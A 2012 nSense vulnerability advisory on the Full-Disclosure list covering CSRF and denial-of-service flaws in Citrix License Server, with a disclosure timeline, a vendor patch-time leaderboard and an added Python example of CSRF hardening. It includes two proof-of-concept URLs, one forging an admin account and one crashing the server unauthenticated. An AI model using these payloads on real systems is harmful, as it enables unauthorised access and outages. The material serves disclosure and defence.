nSense Vulnerability Research Security Advisory NSENSE-2012-001
---------------------------------------------------------------

Affected Vendor:  Citrix
Affected Product: Citrix License Server 11.6.1 build 10007
Impact:           DoS, CSRF
Vendor response:  New version released
CVE:              N/A
Credit:           Rune & Knud aka Smurfbuddies / nSense
Release date:     15 Mar 2012
Vendor link:      http://support.citrix.com/article/CTX128167

Technical details
---------------------------------------------------------------

The license server web management interface contains two vulnerabilities:

1) Denial-of-Service vulnerability which allows an unauthenticated attacker
   to crash the license server.

2) Cross Site Request Forgery vulnerability which enables an attacker to
   create additional users in the management interface, IF a logged-in
   administrator can be lured to visit a link pointing to the vulnerable
   functionality.

Timeline:

2010-12-20 Sent an e-mail to secure@citrix.com with vulnerability details
2010-12-20 Citrix acknowledged the submission and opened a case
2011-01-31 Requested a status update
2011-01-31 Citrix replied, stated vulnerabilities are in a third party component
2011-01-31 Requested more detailed information about the patch schedule
2011-02-14 Requested a status update
2011-02-14 Citrix replied
2011-02-16 Requested more detailed information to justify deadline extension
2011-02-17 Citrix replied
2011-02-17 Requested information about the bulletin
2011-02-17 Citrix replied
2011-02-23 Citrix delivered bulletin information
2011-02-23 Requested information regarding the bulletin
2011-02-23 Citrix replied
2011-02-24 Supplied Citrix information about nSense disclosure policy
2011-03-20 Requested information about the patch schedule
2011-03-29 Requested a status update
2011-03-30 Enquired whether e-mails had been received
2011-03-30 Received an e-mail bounce 550 5.2.0 STOREDRV from support@citrix.com
2011-03-31 Citrix replied
2011-03-31 Acknowledged continuing coordination
2011-04-19 Requested a status update
2011-05-25 Requested a status update
2011-06-15 Requested a status update
2011-06-16 Citrix replied
2011-07-17 Requested a status update
2011-08-17 Requested a status update
2011-08-17 Citrix replied
2011-10-12 Requested a status update
2011-10-21 Requested a status update
2011-10-21 Citrix replied. Still validating patches, still no release date set
2011-11-18 Requested a status update. Sent timeline to Citrix
2011-12-05 Citrix replied. Targeting February 2012. Citrix promised to send
           new information if the planned schedule changes
2012-02-29 February 2012 officially over. No news from Citrix
2012-03-02 Citrix informed they are preparing a release
2012-03-05 Replied and specified credit information
2012-03-13 Citrix replied. Sent knowledge base link
2012-03-15 Advisory released. Old nSense vulnerability coordination policy
           officially terminated.

Proof-of-Concept:

http://citrix-license-server-ip:8082/users?licenseTab=&selected=&userName=xsrf&firstName=xsrf&lastName=xsrf&password2=xsrf&confirm=xsrf&accountType=admin&originalAccountType=&Create=Save
(Administrator CSRF)

http://citrix-license-server-ip:8082/dashboard? =2
(pre auth DoS, crashes lmadmin.exe)

Note! The lmadmin crash was _not_ analyzed in any way.

Additional information
----------------------

As our current vulnerability coordination policy has come to an end, we
wanted to share with you some of the lap times from vendors who have gone
through our test track.

Vendor with a reasonably-priced vulnerability Leaderboard
-----------

VeryPDF:         1 week
Nullsoft:        2 weeks
Adobe:           2 months
Cisco:           2.5 months
SAP:             2.5 months
Adobe:           3 months
Teamspeak:       3 months / no patch (CERT-FI)
Azeotech:        3.5 months (ICS-CERT)
Angelina Jolie*: 5 months (ICS-CERT)
Apple:           6 months
Novell:          8 months
Citrix:          15 months

* Bill Bailey, or was it Scadatec?

And on this bombshell, it is time to end. Good night!
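The CSRF finding above boils down to a state-changing action (user creation) that the server performs for any request arriving with the administrator's session cookie, including a plain GET triggered by a link. The following is an added example, not Citrix's code nor nSense's, that models such an endpoint in a few lines of Python and places the weak handler beside a hardened one. The hardened version applies the standard defences: it refuses to create users on anything but POST, rejects a cross-site Origin header when the browser supplies one, and requires a per-session synchronizer token compared in constant time. The request/session types, handler names and the origin string are hypothetical; the parameter names are the ones from the advisory's PoC link.

```python
"""Added example (not Citrix's or nSense's code): a minimal model of a
user-creation endpoint, in a forgeable form and a hardened form.
All class and function names here are hypothetical."""
import hmac
import secrets
from dataclasses import dataclass
from typing import Dict, Optional

# Constructed in-memory stand-ins for the server's session and user stores.
SESSIONS: Dict[str, dict] = {}          # session id -> {"user": ..., "csrf": ...}
USERS: Dict[str, str] = {"admin": "admin"}  # username -> accountType

SITE_ORIGIN = "http://license-server:8082"   # assumed origin of the management UI


@dataclass
class Request:
    method: str
    params: Dict[str, str]
    cookie_session: Optional[str] = None   # session cookie the browser attaches
    origin: Optional[str] = None           # Origin header, if the browser sent one


def login(username: str) -> str:
    """Create a session and mint a fresh random CSRF token bound to it."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": username, "csrf": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for(sid: str) -> str:
    """Token the legitimate UI embeds in its own forms for this session."""
    return SESSIONS[sid]["csrf"]


def vulnerable_create_user(req: Request) -> int:
    """The pattern the advisory describes: the session cookie is the only
    check, so any request the admin's browser is tricked into sending,
    even a GET from a link, creates the user. Returns an HTTP-style status."""
    session = SESSIONS.get(req.cookie_session or "")
    if session is None:
        return 401
    USERS[req.params["userName"]] = req.params.get("accountType", "user")
    return 200


def hardened_create_user(req: Request) -> int:
    """Same action with CSRF defences layered on top of the session check."""
    session = SESSIONS.get(req.cookie_session or "")
    if session is None:
        return 401
    # 1. State changes only via POST: a link, redirect or <img> tag yields a GET.
    if req.method != "POST":
        return 405
    # 2. When the browser supplies an Origin header, it must be our own site.
    if req.origin is not None and req.origin != SITE_ORIGIN:
        return 403
    # 3. Synchronizer token must be present and match the session's token;
    #    compare as bytes in constant time to avoid a timing side channel.
    token = req.params.get("csrf_token", "")
    if not hmac.compare_digest(token.encode(), session["csrf"].encode()):
        return 403
    USERS[req.params["userName"]] = req.params.get("accountType", "user")
    return 200


def run_demo() -> Dict[str, int]:
    """Replay the advisory's scenario against both handlers (constructed inputs)."""
    USERS.clear()
    USERS["admin"] = "admin"
    sid = login("admin")
    # The PoC link's parameters, arriving as a GET because the logged-in
    # administrator's browser followed a link; no Origin header on navigation.
    forged = {"userName": "xsrf", "firstName": "xsrf", "lastName": "xsrf",
              "password2": "xsrf", "confirm": "xsrf", "accountType": "admin"}
    forged_get = Request("GET", forged, cookie_session=sid)
    results: Dict[str, int] = {}
    results["vuln_get"] = vulnerable_create_user(forged_get)   # 200: user created
    USERS.pop("xsrf", None)
    results["hard_get"] = hardened_create_user(forged_get)     # 405: GET refused
    # A cross-site auto-submitting form would POST with the attacker's Origin
    # and cannot know the session's token.
    forged_post = Request("POST", dict(forged), cookie_session=sid,
                          origin="http://attacker.example")
    results["hard_xsite_post"] = hardened_create_user(forged_post)  # 403
    results["created_by_forgery"] = int("xsrf" in USERS)             # 0
    # Legitimate same-origin POST from the management UI, token included.
    good = Request("POST", {**forged, "csrf_token": csrf_token_for(sid)},
                   cookie_session=sid, origin=SITE_ORIGIN)
    results["hard_good_post"] = hardened_create_user(good)           # 200
    return results


if __name__ == "__main__":
    print(run_demo())
```

The GET-only check alone would have stopped the advisory's link-based PoC, but it is the token check that covers cross-site form posts and older browsers that send no Origin header, which is why all three layers are kept.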
---------------------------------------------------------------
http://www.nsense.dk
http://www.nsense.fi
http://www.nsense.pl

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/